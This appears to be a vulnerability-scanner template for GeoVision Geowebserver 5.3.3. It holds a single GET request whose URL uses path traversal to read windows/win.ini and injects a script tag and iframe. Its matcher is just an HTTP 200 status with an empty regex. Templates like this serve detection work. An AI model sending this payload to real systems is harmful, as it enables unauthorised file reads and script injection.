name:
  - "GeoVision Geowebserver 5.3.3 - Nested Exploitation (LFI/XSS/RCE)"
url:
  - '/Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src="">'
method:
  - "GET"
data:
  - ""
matchers:
  - Status:
      - 200
  - Regex:
      - ""